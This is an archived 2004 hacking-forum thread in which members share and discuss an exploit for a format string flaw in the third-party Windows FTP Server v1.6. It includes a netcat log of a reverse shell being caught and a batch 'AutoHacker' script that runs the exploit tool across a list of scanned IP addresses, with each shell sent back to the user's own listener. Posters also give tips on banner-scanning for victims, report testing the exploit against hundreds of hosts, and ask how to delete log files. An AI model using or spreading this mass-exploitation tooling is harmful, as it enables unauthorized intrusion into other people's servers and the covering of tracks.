hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Public Downloads
BlueSkydrei
Jan 13 2004, 09:40 PM
Have fun,

if it doesn´t work, please tell me ;-)
Test24
Jan 13 2004, 09:41 PM
ok thanks for this but which port do I have to scan is it port 21 ?
-=[MePhIsTo]=-
Jan 13 2004, 09:42 PM
thx m8
i will test it ....

The only way to scan is searching for this Banner
"Welcome to Windows FTP Server"

works fine
CODE

C:\Dokumente und Einstellungen\Andreas\Desktop\Windows_Ftp_Server_v1[1].6>nc -l
-vv -p 1455
listening on [any] 1455 ...
connect to [192.168.0.1] from tnw-server.mshome.net [192.168.0.1] 3448
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINNT\system32>
Test24
Jan 13 2004, 09:49 PM
ok thank you
dennis28
Jan 13 2004, 09:53 PM
sweet job m8 gonna test it smile.gif
Milka
Jan 13 2004, 10:18 PM
w00t tnx m8 gonna take a good look at it biggrin.gif nice biggrin.gif
SkullSplitter
Jan 13 2004, 10:38 PM
DeLuxe Batch File biggrin.gif

CODE

echo off
cls
echo +---------------------------------------------------------+
echo ¦              Windows Ftp Server V1.6 AutoHacker         ¦
echo ¦     (c) 2004 by SkullSplitter -/- Admin of Assassins    ¦
echo +---------------------------------------------------------+
echo.
set /p file=                Enter the Filename:  
If "%file%" =="" GoTo EXIT
set /p ownip=                Enter Your IP:  
set /p port=                Enter Port:
echo.
start nc -L -vv -p %port%
for /f "eol=; tokens=1*" %%i in (%file%) do soft -d %%i -h %ownip% -p %port%
:exit
exit


Best Regards

SkullSplitter
daguilar01
Jan 14 2004, 12:19 AM
just a small note skull, if youre going to do
If "%file%" =="" GoTo EXIT
you might want to define a :EXIT, tongue.gif
Hellraiseruk
Jan 14 2004, 02:13 AM
n1 gonna try it, so taking a guess u scan for p21 smile.gif
dmg
Jan 14 2004, 09:57 AM
Thanx mate gonna give it a try!!
larsbruggie
Jan 14 2004, 01:06 PM
thnx man
The Storm
Jan 14 2004, 01:09 PM
nice work thank you very much I`m gonna test it and hop it works.
ivan288
Jan 14 2004, 02:32 PM
thanx mate, anyone know how common this ftp server is??
hope its not like jordans telnet...
Milka
Jan 14 2004, 02:50 PM
hmmz I get a lot of Microsoft FTP server, isn't that just the same???
m0n0
Jan 14 2004, 03:04 PM
found a few.. didnt work for me tho :\
X-FloppY
Jan 14 2004, 03:31 PM
ive checked more than 200 ip's with this banner and no shell ;S
But Thank's anyway ;D
BlueSkydrei
Jan 14 2004, 03:47 PM
NO, Microsoft FTP Server ist not the same.

Here you can download Windows FTP Server. Than install an start the server.

http://srv.nease.net/

Change in hax.bat the IP to your local IP, netcat port to 22. Then start netcat on port 22. Change your IP.txt an write in only your local IP. Then start run.bat.

you´ll see you get a root shell on your own pc.

It works very fine ;-)

NOTE: Dont put in all scanned port 21 IP´s in your ip.txt, only those IP´s where you can see that it is an WFTPS. Take a banner scanner to scan for WFTPS.......
m0n0
Jan 14 2004, 04:23 PM
lol, i tried it and its closed the ftp...
ph34r.gif blink.gif
Phoenix
Jan 14 2004, 04:34 PM
QUOTE
lol, i tried it and its closed the ftp...


Yes, but you have a shell!


greetz

Phoenix
Helloman
Jan 14 2004, 08:33 PM
very nice tool. Thx a lot. I hope it will works. Maybe this bug is very good smile.gif
chrispen
Jan 14 2004, 08:36 PM
The Windows FTP Server is a small free third party ftp server which contains a format string vulnerability in v1.6.1

it's not the ftp server from microsoft... so chances are really really low
Vosgia
Jan 14 2004, 09:17 PM
works fine but who has this ftp server installed? biggrin.gif
NOBODY i think!
drizzlah
Jan 14 2004, 09:17 PM
thx m8 for this great tools go to take @ look
ivan288
Jan 14 2004, 10:36 PM
yea this bug is pretty rare since its not a very popular app. sad.gif
Nick
Jan 14 2004, 11:37 PM
i'll test it

thxs
yeyo
Jan 15 2004, 09:20 AM
Thanks a lot 4 your work man biggrin.gif
asus210
Jan 27 2004, 03:32 PM
big thx for this
flashb4ck
Feb 2 2004, 08:14 PM
1 question !
is this secure?
i think that microsofts ftp will log every event when u are try to ploit it ....
if this is so can u tell me how to delete the logfiles ?!?

Inetpub\Logs?

greetz fl4Shb4Ck
phaeton
Feb 2 2004, 08:52 PM
Here is a hint. READ THE THREAD BEFORE REPLYING.

THIS EXPLOIT IS NOT FOR MS's FTPSVC!

It is for WINDOWS FTP SERVER which is a third party app.
flashb4ck
Feb 2 2004, 09:24 PM
oh sorry when i hear windows i think thats some app from microsoft *G*

tibbar
Mar 12 2004, 10:26 PM
hmmm ive tried this on a windows ftp server. It crashes the server fine, but when i netcat to the port i selected, nothing happens...

im behind a router and set it on DMZ mode beforehand, and specified my external ip in the exploit.

any ideas why its not working?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.